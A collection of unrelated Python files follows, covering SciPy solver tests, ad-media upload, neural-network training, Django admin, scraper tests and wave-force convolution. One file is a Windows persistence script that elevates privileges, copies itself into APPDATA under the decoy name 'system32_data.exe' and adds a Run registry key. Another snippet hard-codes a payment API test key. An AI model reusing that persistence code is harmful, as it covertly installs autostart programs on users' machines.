assert_allclose(res.optimality, 0, atol=1e-6)
A = aslinearoperator(A)
res = lsq_linear(A, b)
assert_allclose(res.optimality, 0, atol=1e-6)
def test_sparse_bounds(self):
m = 5000
n = 1000
A = rand(m, n, random_state=0)
b = self.rnd.randn(m)
lb = self.rnd.randn(n)
ub = lb + 1
res = lsq_linear(A, b, (lb, ub))
assert_allclose(res.optimality, 0.0, atol=1e-8)
res = lsq_linear(A, b, (lb, ub), lsmr_tol=1e-13)
assert_allclose(res.optimality, 0.0, atol=1e-8)
res = lsq_linear(A, b, (lb, ub), lsmr_tol='auto')
assert_allclose(res.optimality, 0.0, atol=1e-8)
class TestTRF(BaseMixin, SparseMixin):
method = 'trf'
lsq_solvers = ['exact', 'lsmr']
class TestBVLS(BaseMixin):
method = 'bvls'
lsq_solvers = ['exact']
if __name__ == '__main__':
run_module_suite()
|
67361
|
import base64
from auth_helper import *
from campaignmanagement_example_helper import *
# You must provide credentials in auth_helper.py.
# To run this example you'll need to provide your own images.
# For required aspect ratios and recommended dimensions please see
# Image remarks at https://go.microsoft.com/fwlink/?linkid=872754.
MEDIA_FILE_PATH = "c:\dev\media\\"
RESPONSIVE_AD_MEDIA_FILE_NAME = "imageresponsivead1200x628.png"
IMAGE_AD_EXTENSION_MEDIA_FILE_NAME = "imageadextension300x200.png"
def main(authorization_data):
try:
responsive_ad_image_media = get_image_media(
"Image191x100",
MEDIA_FILE_PATH + RESPONSIVE_AD_MEDIA_FILE_NAME)
image_ad_extension_media = get_image_media(
"Image15x10",
MEDIA_FILE_PATH + IMAGE_AD_EXTENSION_MEDIA_FILE_NAME)
add_media = {
'Media':
[
responsive_ad_image_media,
image_ad_extension_media
]
}
output_status_message("Ready to upload image media:")
output_array_of_media(add_media)
output_status_message("-----\nAddMedia:")
media_ids = campaign_service.AddMedia(
AccountId=authorization_data.account_id,
Media=add_media)
output_status_message("MediaIds:")
output_array_of_long(media_ids)
# Get the media representations to confirm the stored dimensions
# and get the Url where you can later view or download the media.
output_status_message("-----\nGetMediaMetaDataByAccountId:")
get_responsive_ad_mediametadata = campaign_service.GetMediaMetaDataByAccountId(
MediaEnabledEntities='ResponsiveAd',
PageInfo=None)
output_status_message("MediaMetaData:")
output_array_of_mediametadata(get_responsive_ad_mediametadata)
output_status_message("-----\nGetMediaMetaDataByAccountId:")
get_image_ad_extension_mediametadata = campaign_service.GetMediaMetaDataByAccountId(
MediaEnabledEntities='ImageAdExtension',
PageInfo=None)
output_status_message("MediaMetaData:")
output_array_of_mediametadata(get_image_ad_extension_mediametadata)
output_status_message("-----\nGetMediaMetaDataByIds:")
get_mediametadata = campaign_service.GetMediaMetaDataByIds(
MediaIds=media_ids).MediaMetaData
output_status_message("MediaMetaData:")
output_array_of_mediametadata(get_mediametadata)
# Delete the account's media.
output_status_message("-----\nDeleteMedia:")
delete_media_response = campaign_service.DeleteMedia(
authorization_data.account_id,
media_ids)
for id in media_ids['long']:
output_status_message("Deleted Media Id {0}".format(id))
except WebFault as ex:
output_webfault_errors(ex)
except Exception as ex:
output_status_message(ex)
def get_image_media(
media_type,
image_file_name):
image = campaign_service.factory.create('Image')
image.Data = get_bmp_base64_string(image_file_name)
image.MediaType = media_type
image.Type = "Image"
return image
def get_bmp_base64_string(image_file_name):
image = open(image_file_name, 'rb')
image_bytes = image.read()
base64_string = base64.encodebytes(image_bytes)
return base64_string
# Main execution
if __name__ == '__main__':
print("Loading the web service client proxies...")
authorization_data=AuthorizationData(
account_id=None,
customer_id=None,
developer_token=<PASSWORD>,
authentication=None,
)
campaign_service=ServiceClient(
service='CampaignManagementService',
version=13,
authorization_data=authorization_data,
environment=ENVIRONMENT,
)
authenticate(authorization_data)
main(authorization_data)
|
67391
|
import numpy as np
import torch
import torch.nn.functional as F
from nnlib.nnlib import visualizations as vis
from nnlib.nnlib import losses, utils
from modules import nn_utils
from methods.predict import PredictGradBaseClassifier
class LIMIT(PredictGradBaseClassifier):
""" The main method of "Improving generalization by controlling label-noise
information in neural network weights" paper. This method trains a classifier
using gradients predicted by another network, without directly using labels.
As in the paper, only the gradient with respect to the output of the last layer
is predicted; the remaining gradients are computed using backpropagation, starting
with the predicted gradient.
For more details, refer to the paper at https://arxiv.org/abs/2002.07933.
"""
@utils.capture_arguments_of_init
def __init__(self, input_shape, architecture_args, device='cuda',
grad_weight_decay=0.0, lamb=1.0, sample_from_q=False,
q_dist='Gaussian', load_from=None, warm_up=0, **kwargs):
"""
:param input_shape: the input shape of an example. E.g. for CIFAR-10 this is (3, 32, 32).
:param architecture_args: dictionary usually parsed from a json file from the `configs`
directory. This specifies the architecture of the classifier and the architecture of
the gradient predictor network: `q-network`. If you don't want to parse the networks
from arguments, you can modify the code so that self.classifier and self.q_network
directly point to the correct models.
:param device: the device on which the model is stored and executed.
:param grad_weight_decay: the strength of regularization of the mean of the predicted gradients,
||\mu||_2^2. Usually values from [0.03 - 10] work well. Refer to the paper for more guidance.
:param lamb: this is the coefficient in front of the H(p, q) term. Unless `sample_from_q=True`,
setting this to anything but 1.0 has no effect. When `sample_from_q=True`, `lamb` specifies
the variance of the predicted gradients.
:param sample_from_q: whether to sample from the q distribution (predicted gradient distribution),
or to use the mean.
:param q_dist: what distribution predicted gradients should follow. Options are 'Gaussian', 'Laplace',
'ce'. The first two are self-explanatory and were used in the paper under the names LIMIT_G
and LIMIT_L. The option 'ce' corresponds to a hypothetical case where H(p,q) reduces to
CE(q_label_pred, actual_label). This latter option may work better for some datasets. When
`q_dist='ce'`, `sample_from_q` has to be False.
:param load_from: path to a file where another model (already trained) was saved. This will be loaded,
and the training will continue from this starting point. Note that the saved model needs to be saved
using nnlib.nnlib.utils.save function.
:param warm_up: number of initial epochs for which the classifier is not trained at all. This is done to
give the q-network enough time to learn meaningful gradient predictions before using those predicted
gradients to train the classifier.
:param kwargs: additional keyword arguments that are passed to the parent methods. For this class it
can be always empty.
"""
super(LIMIT, self).__init__(**kwargs)
self.args = None # this will be modified by the decorator
self.input_shape = [None] + list(input_shape)
self.architecture_args = architecture_args
self.grad_weight_decay = grad_weight_decay
self.lamb = lamb
self.sample_from_q = sample_from_q
self.q_dist = q_dist
self.load_from = load_from
self.warm_up = warm_up
# lamb is the coefficient in front of the H(p,q) term. It controls the variance of predicted gradients.
if self.q_dist == 'Gaussian':
self.grad_replacement_class = nn_utils.get_grad_replacement_class(
sample=self.sample_from_q, standard_dev=np.sqrt(1.0 / 2.0 / (self.lamb + 1e-12)), q_dist=self.q_dist)
elif self.q_dist == 'Laplace':
self.grad_replacement_class = nn_utils.get_grad_replacement_class(
sample=self.sample_from_q, standard_dev=np.sqrt(2.0) / (self.lamb + 1e-6), q_dist=self.q_dist)
elif self.q_dist == 'ce':
# This is not an actual distribution. Instead, it corresponds to the hypothetical case where
# the H(p,q) term reduces to ce(q_label_pred, actual_label).
assert not self.sample_from_q
self.grad_replacement_class = nn_utils.get_grad_replacement_class(sample=False)
else:
raise NotImplementedError()
# initialize the network
self.classifier, output_shape = nn_utils.parse_network_from_config(args=self.architecture_args['classifier'],
input_shape=self.input_shape)
self.classifier = self.classifier.to(device)
self.num_classes = output_shape[-1]
self.q_network, _ = nn_utils.parse_network_from_config(args=self.architecture_args['q-network'],
input_shape=self.input_shape)
self.q_network = self.q_network.to(device)
if self.load_from is not None:
print("Loading the gradient predictor model from {}".format(load_from))
import methods
stored_net = utils.load(load_from, methods=methods, device='cpu')
stored_net_params = dict(stored_net.classifier.named_parameters())
for key, param in self.q_network.named_parameters():
param.data = stored_net_params[key].data.to(device)
def forward(self, inputs, grad_enabled=False, **kwargs):
torch.set_grad_enabled(grad_enabled)
x = inputs[0].to(self.device)
# compute classifier predictions
pred = self.classifier(x)
# predict the gradient wrt to logits
q_label_pred = self.q_network(x)
q_label_pred_softmax = torch.softmax(q_label_pred, dim=1)
# NOTE: we detach here too, so that the classifier is trained using the predicted gradient only
pred_softmax = torch.softmax(pred, dim=1).detach()
grad_pred = pred_softmax - q_label_pred_softmax
# replace the gradients
pred_before = pred
pred = self.grad_replacement_class.apply(pred, grad_pred)
out = {
'pred': pred,
'q_label_pred': q_label_pred,
'grad_pred': grad_pred,
'pred_before': pred_before
}
return out
def compute_loss(self, inputs, labels, outputs, grad_enabled, **kwargs):
torch.set_grad_enabled(grad_enabled)
pred_before = outputs['pred_before']
grad_pred = outputs['grad_pred']
y = labels[0].to(self.device)
y_one_hot = F.one_hot(y, num_classes=self.num_classes).float()
# classification loss
classifier_loss = F.cross_entropy(input=outputs['pred'], target=y)
# compute the actual gradient
# NOTE: we detach here too, so that the classifier is trained using the predicted gradient only
pred_softmax = torch.softmax(pred_before.detach(), dim=1)
grad_actual = pred_softmax - y_one_hot
# I(g : y | x) penalty
if self.q_dist == 'Gaussian':
info_penalty = losses.mse(grad_pred, grad_actual)
elif self.q_dist == 'Laplace':
info_penalty = losses.mae(grad_pred, grad_actual)
elif self.q_dist == 'ce':
info_penalty = losses.get_classification_loss(target=y_one_hot,
pred=outputs['q_label_pred'],
loss_function='ce')
else:
raise NotImplementedError()
batch_losses = {
'classifier': classifier_loss,
'info_penalty': info_penalty
}
# add predicted gradient norm penalty
if self.grad_weight_decay > 0:
grad_l2_loss = self.grad_weight_decay * \
torch.mean(torch.sum(grad_pred ** 2, dim=1), dim=0)
batch_losses['pred_grad_l2'] = grad_l2_loss
return batch_losses, outputs
def on_epoch_start(self, partition, epoch, **kwargs):
super(LIMIT, self).on_epoch_start(partition=partition, epoch=epoch, **kwargs)
if partition == 'train':
requires_grad = (epoch >= self.warm_up)
for param in self.classifier.parameters():
param.requires_grad = requires_grad
def visualize(self, train_loader, val_loader, tensorboard=None, epoch=None, **kwargs):
visualizations = super(LIMIT, self).visualize(train_loader, val_loader,
tensorboard, epoch)
# visualize q_label_pred
fig, _ = vis.plot_predictions(self, train_loader, key='q_label_pred')
visualizations['predictions/q-label-pred-train'] = fig
if val_loader is not None:
fig, _ = vis.plot_predictions(self, val_loader, key='q_label_pred')
visualizations['predictions/q-label-pred-val'] = fig
return visualizations
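# A minimal sketch of the gradient-replacement trick LIMIT relies on. The actual helper,
# nn_utils.get_grad_replacement_class, is not shown in this file, so the class below is an
# assumption about its core behaviour: the forward pass returns the logits unchanged, while
# the backward pass discards the upstream gradient and propagates the predicted one instead.
class _ReplaceGradSketch(torch.autograd.Function):
    @staticmethod
    def forward(ctx, pred, grad_pred):
        # Stash the predicted gradient for the backward pass.
        ctx.save_for_backward(grad_pred)
        return pred

    @staticmethod
    def backward(ctx, grad_output):
        (grad_pred,) = ctx.saved_tensors
        # Gradient w.r.t. `pred` is the predicted one; `grad_pred` itself receives none.
        return grad_pred, None

# Hypothetical usage, mirroring self.grad_replacement_class.apply(pred, grad_pred) in forward():
#   pred = _ReplaceGradSketch.apply(pred, grad_pred)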
|
67425
|
from .transformation_workflows import (AffineTransformationWorkflow,
LinearTransformationWorkflow,
TransformixCoordinateTransformationWorkflow,
TransformixTransformationWorkflow)
|
67447
|
import os, subprocess
if __name__ == "__main__":
move_into_container = list()
if input("Do you want to move some of your local files into to container? This will overwrite files from origin/master. (y/n) ").startswith("y"):
for f in sorted(os.listdir()):
if input("Move %s into container (y/n)? " % f).startswith("y"):
move_into_container.append(f)
if move_into_container:
subprocess.call(["tar", "-czvf", "move_into_container.tar.gz"] + move_into_container)
image_name = input("Name of Image? (Default: Auto-PyTorch.simg) ") or "Auto-PyTorch.simg"
if os.path.exists(image_name) and input("%s exists. Remove (y/n)? " % image_name).startswith("y"):
os.remove(image_name)
print("Building Singularity container. You need to be root for that.")
subprocess.call(["sudo", "singularity", "build", image_name, "scripts/Singularity"])
if move_into_container:
os.remove("move_into_container.tar.gz")
|
67454
|
from easydict import EasyDict as edict
import numpy as np
config = edict()
config.IMG_HEIGHT = 375
config.IMG_WIDTH = 1242
# TODO(shizehao): infer fea shape in run time
config.FEA_HEIGHT = 12
config.FEA_WIDTH = 39
config.EPSILON = 1e-16
config.LOSS_COEF_BBOX = 5.0
config.LOSS_COEF_CONF_POS = 75.0
config.LOSS_COEF_CONF_NEG = 100.0
config.LOSS_COEF_CLASS = 1.0
config.EXP_THRESH = 1.0
config.RBG_MEANS = np.array([[[ 123.68, 116.779, 103.939]]])
def set_anchors(H, W):
B = 9
shape = np.array(
[[ 36., 37.], [ 366., 174.], [ 115., 59.],
[ 162., 87.], [ 38., 90.], [ 258., 173.],
[ 224., 108.], [ 78., 170.], [ 72., 43.]])
# # scale
# shape[:, 0] = shape[:, 0] / config.IMG_HEIGHT
# shape[:, 1] = shape[:, 1] / config.IMG_WIDTH
anchor_shapes = np.reshape(
[shape] * H * W,
(H, W, B, 2)
)
center_x = np.reshape(
np.transpose(
np.reshape(
np.array([np.arange(1, W+1)*float(config.IMG_WIDTH)/(W+1)]*H*B),
(B, H, W)
),
(1, 2, 0)
),
(H, W, B, 1)
)
center_y = np.reshape(
np.transpose(
np.reshape(
np.array([np.arange(1, H+1)*float(config.IMG_HEIGHT)/(H+1)]*W*B),
(B, W, H)
),
(2, 1, 0)
),
(H, W, B, 1)
)
anchors = np.reshape(
np.concatenate((center_x, center_y, anchor_shapes), axis=3),
(-1, 4)
)
return anchors
config.ANCHOR_SHAPE = set_anchors(config.FEA_HEIGHT, config.FEA_WIDTH)
config.NUM_ANCHORS = 9
config.NUM_CLASSES = 3
config.ANCHORS = config.NUM_ANCHORS * config.FEA_HEIGHT * config.FEA_WIDTH
config.PLOT_PROB_THRESH = 0.4
config.NMS_THRESH = 0.4
config.PROB_THRESH = 0.005
config.TOP_N_DETECTION = 64
|
67472
|
def forrest(self):
'''Random Forest based reduction strategy. Somewhat more
aggressive than, for example, 'spearman' because there are no
negative values; instead, the highest positive correlation
is subtracted from all the values so that the maximum value is 0, and
the values are then made positive (absolute). The one with the highest
positive score in the end will be dropped. This means that anything
that was originally 0 is a candidate for dropping. Because there are
multiple zeroes in many cases, there is an element of randomness in
which one is dropped.
'''
import wrangle
import numpy as np
# handle conversion to multi_labels
from .reduce_utils import cols_to_multilabel
data = cols_to_multilabel(self)
# get the correlations
corr_values = wrangle.df_corr_randomforest(data, self.reduction_metric)
# drop labels where value is NaN
corr_values.dropna(inplace=True)
# handle the turning around of values (see docstring for more info)
corr_values -= corr_values[0]
corr_values = corr_values.abs()
# get the strongest correlation
corr_values = corr_values.index[-1]
# get the label, value, and dtype from the column header
label, dtype, value = corr_values.split('~')
# convert things back to their original dtype
value = np.array([value]).astype(dtype)[0]
# this is where we modify the parameter space accordingly
self.param_object.remove_is(label, value)
return self
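# A small numeric sketch (made-up values) of the value-flipping step described in the
# docstring above, assuming corr_values arrives sorted with the strongest correlation
# first: subtracting the top value pushes the maximum to 0, abs() flips the sign, and
# the last (largest) entry -- originally a zero correlation -- becomes the drop candidate.
import pandas as pd

demo = pd.Series([0.9, 0.4, 0.0],
                 index=['lr~float~0.1', 'units~int~32', 'dropout~float~0.0'])
demo -= demo.iloc[0]              # -> [0.0, -0.5, -0.9]
demo = demo.abs()                 # -> [0.0, 0.5, 0.9]
drop_candidate = demo.index[-1]   # -> 'dropout~float~0.0'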
|
67476
|
import seaborn as sns

sns.catplot(data=density_mean, kind="bar",
x='Bacterial_genotype',
y='optical_density',
hue='Phage_t',
row="experiment_time_h",
sharey=False,
aspect=3, height=3,
palette="colorblind")
|
67517
|
import torch
from torch import nn
from torch.autograd import Variable
import random
print_shape_flag = True
class Seq2Seq(nn.Module):
def __init__(self, encoder, decoder, output_max_len, vocab_size):
super(Seq2Seq, self).__init__()
self.encoder = encoder
self.decoder = decoder
self.output_max_len = output_max_len
self.vocab_size = vocab_size
# src: Variable
# tar: Variable
def forward(self, src, tar, src_len, lambd, teacher_rate, train=True):
tar = tar.permute(1, 0) # time_s, batch
batch_size = src.size(0)
#max_len = tar.size(0) # <go> true_value <end>
outputs = Variable(torch.zeros(self.output_max_len-1, batch_size, self.vocab_size), requires_grad=True) # (14, 32, 62) not save the first <GO>
outputs = outputs.cuda()
#src = Variable(src)
out_enc, hidden_enc, out_domain = self.encoder(src, src_len, lambd)
# t,b,f layers, b,f b, fixed_length
global print_shape_flag
if print_shape_flag:
print('First batch shape (batch shapes are not all the same):')
print(out_enc.shape, self.output_max_len)
print_shape_flag = False
output = Variable(self.one_hot(tar[0].data))
attns = []
hidden = hidden_enc
#hidden = hidden_enc.unsqueeze(0) # 1, batch, hidden_size
#init_hidden_dec = [hidden] * self.decoder.n_layers
#hidden = torch.cat(init_hidden_dec, dim=0)
attn_weights = Variable(torch.zeros(out_enc.shape[1], out_enc.shape[0]), requires_grad=True).cuda() # b, t
for t in range(0, self.output_max_len-1): # max_len: groundtruth + <END>
teacher_force_rate = random.random() < teacher_rate
output, hidden, attn_weights = self.decoder(
output, hidden, out_enc, src_len, attn_weights)
outputs[t] = output
#top1 = output.data.topk(1)[1].squeeze()
output = Variable(self.one_hot(tar[t+1].data) if train and teacher_force_rate else output.data)
attns.append(attn_weights.data.cpu()) # [(32, 55), ...]
return outputs, attns, out_domain
def one_hot(self, src): # src: torch.cuda.LongTensor
ones = torch.eye(self.vocab_size).cuda()
return ones.index_select(0, src)
|
67542
|
from django.urls import reverse
from django.contrib.admin.templatetags.admin_modify import submit_row
from django.utils.encoding import force_text
from django.template import Library
register = Library()
@register.inclusion_tag('subadmin/breadcrumbs.html', takes_context=True)
def subadmin_breadcrumbs(context):
request = context['request']
opts = context['opts']
root = {
'name': request.subadmin.root['object']._meta.app_config.verbose_name,
'url': reverse('admin:app_list', kwargs={'app_label': request.subadmin.root['object']._meta.app_label})
}
breadcrumbs = []
view_args = list(request.subadmin.view_args)
i = 0
subadmin_parents = request.subadmin.parents[::-1]
for parent in subadmin_parents:
adm = parent['admin']
obj = parent['object']
breadcrumbs.extend([{
'name': obj._meta.verbose_name_plural,
'url': adm.reverse_url('changelist', *view_args[:i]),
'has_change_permission': adm.has_change_permission(request),
}, {
'name': force_text(obj),
'url': adm.reverse_url('change', *view_args[:i + 1]),
'has_change_permission': adm.has_change_permission(request, obj),
}])
i += 1
return {
'root': root,
'breadcrumbs': breadcrumbs,
'opts': opts,
}
@register.simple_tag(takes_context=True)
def subadmin_url(context, viewname, *args, **kwargs):
subadmin = context['request'].subadmin
view_args = subadmin.base_url_args[:-1] if subadmin.object_id else subadmin.base_url_args
return reverse('admin:%s_%s' % (subadmin.base_viewname, viewname), args=view_args + list(args), kwargs=kwargs)
@register.inclusion_tag('subadmin/submit_line.html', takes_context=True)
def subadmin_submit_row(context):
ctx = submit_row(context)
ctx.update({
'request': context['request']
})
return ctx
|
67552
|
import balanced
balanced.configure('ak-test-2eKlj1ZDfAcZSARMf3NMhBHywDej0avSY')
reversal = balanced.Reversal.fetch('/reversals/RV6AleFrrhNHBDpr9W9ozGmY')
reversal.description = 'update this description'
reversal.meta = {
'user.refund.count': '3',
'refund.reason': 'user not happy with product',
'user.notes': 'very polite on the phone',
}
reversal.save()
|
67572
|
from datetime import datetime
from os.path import dirname, join
from unittest.mock import MagicMock
import pytest
from city_scrapers_core.constants import BOARD, TENTATIVE
from city_scrapers_core.utils import file_response
from freezegun import freeze_time
from city_scrapers.spiders.chi_library import ChiLibrarySpider
freezer = freeze_time("2018-12-20")
freezer.start()
session = MagicMock()
res_mock = MagicMock()
res_mock.status_code = 200
session.get.return_value = res_mock
test_response = file_response(
join(dirname(__file__), "files", "chi_library.html"),
url="https://www.chipublib.org/board-of-directors/board-meeting-schedule/",
)
spider = ChiLibrarySpider(session=session)
parsed_items = [item for item in spider.parse(test_response)]
freezer.stop()
def test_title():
assert parsed_items[0]["title"] == "Board of Directors"
def test_description():
assert parsed_items[0]["description"] == ""
def test_start():
assert parsed_items[0]["start"] == datetime(2021, 1, 26, 9)
def test_id():
assert parsed_items[0]["id"] == "chi_library/202101260900/x/board_of_directors"
def test_status():
assert parsed_items[0]["status"] == TENTATIVE
def test_all_day():
assert parsed_items[0]["all_day"] is False
def test_location():
assert parsed_items[0]["location"] == {
"address": "",
"name": "Virtual",
}
def test_links():
assert parsed_items[0]["links"] == [
{
"href": "https://www.chipublib.org/news/board-of-directors-meeting-agenda-january-26-2021/", # noqa
"title": "Agenda",
},
{
"href": "https://www.chipublib.org/news/board-of-directors-meeting-minutes-january-26-2021/", # noqa
"title": "Minutes",
},
]
@pytest.mark.parametrize("item", parsed_items)
def test_classification(item):
assert item["classification"] == BOARD
@pytest.mark.parametrize("item", parsed_items)
def test_end(item):
assert item["end"] is None
@pytest.mark.parametrize("item", parsed_items)
def test_source(item):
assert (
item["source"]
== "https://www.chipublib.org/board-of-directors/board-meeting-schedule/"
)
|
67574
|
from threading import Thread
from queue import Queue
import numpy as np
from ...libffcv import read
class PageReader(Thread):
def __init__(self, fname:str, queries: Queue, loaded: Queue,
memory: np.ndarray):
self.fname: str = fname
self.queries: Queue = queries
self.memory: np.ndarray = memory
self.page_size = memory.shape[1]
self.loaded: Queue = loaded
super().__init__(daemon=True)
def run(self):
import hashlib
with open(self.fname, 'rb') as handle:
fileno = handle.fileno()
while True:
query = self.queries.get()
# No more work
if query is None:
break
page_number, slot = query
offset = np.uint64(page_number * self.page_size)
length = read(fileno, self.memory[slot], offset)
# print("L", page_number, slot, hashlib.md5(self.memory[slot]).hexdigest(), self.memory[slot].ctypes.data, length)
self.loaded.put(page_number)
|
67577
|
import os
import shutil
import winreg
import sys
import time
from elevate import elevate
elevate()
print("elevated")
curr_executable = sys.executable
print(curr_executable)
time.sleep(5)
app_data = os.getenv("APPDATA")
to_save_file = app_data +"\\"+"system32_data.exe"
time.sleep(5)
print(to_save_file)
if not os.path.exists(to_save_file):
print("Becoming Persistent")
shutil.copyfile(curr_executable, to_save_file)
key = winreg.HKEY_CURRENT_USER
# "Software\Microsoft\Windows\CurrentVersion\Run"
key_value = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
key_obj = winreg.OpenKey(key, key_value, 0, winreg.KEY_ALL_ACCESS)
winreg.SetValueEx(key_obj, "systemfilex64", 0, winreg.REG_SZ, to_save_file)
winreg.CloseKey(key_obj)
else:
print("path doesnt exist")
time.sleep(100)
|
67579
|
import SimpleITK as sitk
import numpy as np
#from segmentation.lungmask import mask
import glob
from tqdm import tqdm
import os
from segmentation.predict import predict,get_model
#from segmentation.unet import UNet
os.environ["CUDA_VISIBLE_DEVICES"] = '6'
lung_dir = '/mnt/data11/seg_of_XCT/lung/CAP/'
leision_dir = '/mnt/data11/seg_of_XCT/lesion/CAP/'
root_dir = '/home/cwx/extra/dr_ct_data/CT/CAP'
filelist = glob.glob(root_dir)
os.makedirs(leision_dir,exist_ok=True)
model2 = './checkpoint_final.pth'
model = get_model(model2,n_classes=2)
print('get model done')
for filepath in filelist:
imagelist = glob.glob(filepath+'/*.nii')
for imagepath in tqdm(imagelist, dynamic_ncols=True):
imagename = imagepath.split('/')[-1]
batch_id = imagepath.split('/')[-2]
if os.path.exists(leision_dir+batch_id+'_'+imagename.replace('.nii','_label.nrrd')):
print(imagename)
continue
input_image = sitk.ReadImage(imagepath)
segmentation = predict(input_image, model = model,batch_size=16,lesion=True)
segmentation[segmentation>1]=1
lung_image = sitk.ReadImage(lung_dir+batch_id+'_'+imagename)
lung_data = sitk.GetArrayFromImage(lung_image)
leision_seg = lung_data*segmentation
leision_seg=np.array(leision_seg,np.uint8)
result_out= sitk.GetImageFromArray(leision_seg)
result_out.CopyInformation(input_image)
sitk.WriteImage(result_out,leision_dir+batch_id+'_'+imagename.replace('.nii','_label.nrrd'))
print(imagename)
|
67616
|
from typing import Callable
def rpc(*, name) -> Callable:
"""Decorate a coroutine as an RPC method that can be executed by the server.
Args:
name: The name of the RPC method
Returns:
A decorator that will mark the coroutine as an RPC method
"""
def decorator(func) -> Callable:
func.__rpc_handler__ = True
func.__name__ = name or func.__name__
return func
return decorator
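# --- Usage sketch (added for illustration; the "ping" handler below is a
# hypothetical example, not part of the original module) ---
@rpc(name="ping")
async def ping_handler() -> str:
    return "pong"
# The decorator only tags the coroutine; a server-side registry would later
# discover handlers by looking for this attribute.
assert ping_handler.__rpc_handler__ is True
assert ping_handler.__name__ == "ping"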
|
67656
|
from django.contrib import admin
from api.logger import logger
from api.models import User
import registrations.models as models
from reversion_compare.admin import CompareVersionAdmin
class PendingAdmin(CompareVersionAdmin):
search_fields = ('user__username', 'user__email', 'admin_contact_1', 'admin_contact_2')
list_display = (
'get_username_and_mail', 'created_at',
'admin_contact_1', 'admin_1_validated', 'admin_1_validated_date',
'admin_contact_2', 'admin_2_validated', 'admin_2_validated_date',
'email_verified', 'user_is_active'
)
actions = ('activate_users',)
# Get the 'user' objects with a JOIN query
def get_queryset(self, request):
return super().get_queryset(request).select_related('user')
def get_username_and_mail(self, obj):
return obj.user.username + ' - ' + obj.user.email
def user_is_active(self, obj):
return 'Yes' if obj.user.is_active else ''
def activate_users(self, request, queryset):
for pu in queryset:
usr = User.objects.filter(id=pu.user_id).first()
if usr:
if usr.is_active is False:
usr.is_active = True
usr.save()
else:
logger.info(f'User {usr.username} was already active')
else:
logger.info(f'There is no User record with the ID: {pu.user_id}')
def get_actions(self, request):
actions = super(PendingAdmin, self).get_actions(request)
if not request.user.is_superuser:
del actions['activate_users']
return actions
class DomainWhitelistAdmin(CompareVersionAdmin):
list_display = ('domain_name', 'description', 'is_active')
search_fields = ('domain_name',)
ordering = ('domain_name',)
admin.site.register(models.Pending, PendingAdmin)
admin.site.register(models.DomainWhitelist, DomainWhitelistAdmin)
|
67675
|
import numpy as np
from scipy import interpolate
from progressbar import ProgressBar, Bar, Percentage
class ImpulseResponseFunction(object):
'''Internal bemio object to contain impulse response function (IRF) data
'''
pass
class WaveElevationTimeSeries(object):
'''Internal bemio object to contain wave elevation time series data
'''
pass
class WaveExcitationForce(object):
'''Internal bemio object to contain wave excitation force data
'''
pass
class WaveExcitationConvolution(object):
'''
Object for calculating wave excitation force time history using the
convolution method
Parameters:
irf : np.array
Wave excitation force impulse response function.
irf_t : np.array
Time series corresponding to `irf`
eta : np.array
Wave elevation time series
eta_t : np.array
Time series corresponding to `eta`
    Attributes:
self.irf : ImpulseResponseFunction
Object containing excitation force IRF information
self.wave_elevation : WaveElevationTimeSeries
Object containing wave elevation time series data
self.excitation_force : WaveExcitationForce
Object containing wave excitation force data
'''
def __init__(self, irf, irf_t, eta, eta_t):
self.irf = ImpulseResponseFunction()
self.wave_elevation = WaveElevationTimeSeries()
self.excitation_force = WaveExcitationForce()
self.irf.f = irf
self.irf.t = irf_t
self.wave_elevation.eta = eta
self.wave_elevation.t = eta_t
self.wave_elevation.dt = self.wave_elevation.t[1] - self.wave_elevation.t[0]
self._excitation_convolution()
def _excitation_convolution(self):
'''Internal function to perform the wave excitation convolution
'''
eta_interp = interpolate.interp1d(x=self.wave_elevation.t, y=self.wave_elevation.eta, bounds_error=False, fill_value=0.)
irf_interp = interpolate.interp1d(x=self.irf.t, y=self.irf.f, bounds_error=False, fill_value=0.)
        # Interpolate the IRF onto the same dt as the wave elevation data
        n_irf_samples = int(round((self.irf.t.max() - self.irf.t.min()) / self.wave_elevation.dt)) + 1
        irf = irf_interp(np.linspace(self.irf.t.min(), self.irf.t.max(), n_irf_samples))
# Assume that the IRF dt is used unless specified by the user
# if self.excitation_force.dt is None:
# self.excitation_force.dt = self.irf.t[1] - self.irf.t[0]
        # This code calculates the wave excitation force manually - the method below that uses np.convolve is much more efficient
# self.excitation_force.t = np.linspace(self.wave_elevation.t.min(), self.wave_elevation.t.max(), (self.wave_elevation.t.max()-self.wave_elevation.t.min())/self.excitation_force.dt+1)
# pbar_max_val = self.excitation_force.t.max()
# pbar = ProgressBar(widgets=['Calculating the excitation force time history:', Percentage(), Bar()], maxval=pbar_max_val).start()
# f_ex = []
# for t in self.excitation_force.t:
# f_ex.append(np.trapz(y=irf_interp(self.irf.t)*eta_interp(t-self.irf.t),x=self.irf.t))
#
# pbar.update(t)
# pbar.finish()
f_ex_conv = np.convolve(self.wave_elevation.eta, irf, mode='same')*self.wave_elevation.dt
self.excitation_force.f = np.array(f_ex_conv)
self.excitation_force.t = self.wave_elevation.t
def convolution(irf, irf_t, eta, eta_t, dt=None):
'''
Function to calculate wave excitation force using the convolution method
    Parameters:
irf : np.array
Wave excitation force impulse response function.
irf_t : np.array
Time series corresponding to `irf`
eta : np.array
Wave elevation time series
eta_t : np.array
Time series corresponding to `eta`
    dt : float, optional
        Time step for calculating the excitation force time series (note: this
        argument is currently not used by the implementation).
Returns:
excitation_force : WaveExcitationConvolution
This function returns a `WaveExcitationConvolution` object with
the wave exciting force and other information. See the
`WaveExcitationConvolution` for more information.
Example:
The following example assumes that variables `irf`, `irf_t`, `eta`, and
    `eta_t`, each of type np.ndarray, exist in the workspace. The contents of
these variables are described above.
Calculate excitation force using the convolution method
>>> ex = convolution(irf=irf, irf_t=irf_t, eta=eta, eta_t=eta_t)
Plot the data
>>> plt.figure()
>>> plt.plot(ex.excitation_force.t,ex.excitation_force.f)
'''
excitation_force = WaveExcitationConvolution(irf, irf_t, eta, eta_t)
return excitation_force
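# --- Usage sketch (illustrative, not part of the original bemio module) ---
# Exercises the convolution path with synthetic data: a decaying-oscillation
# IRF and a sinusoidal wave elevation. All array contents are made up.
if __name__ == '__main__':
    irf_t = np.linspace(0.0, 20.0, 201)
    irf = np.exp(-0.3 * irf_t) * np.cos(2.0 * np.pi * irf_t / 5.0)
    eta_t = np.linspace(0.0, 200.0, 2001)
    eta = 0.5 * np.sin(2.0 * np.pi * eta_t / 8.0)
    ex = convolution(irf=irf, irf_t=irf_t, eta=eta, eta_t=eta_t)
    print(ex.excitation_force.t.shape, ex.excitation_force.f.shape)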
|
67758
|
import matplotlib.pyplot as plt
import torch
from torch import nn
# Note: ConvFC, train, stim_binary, resp_train, resp_test, and
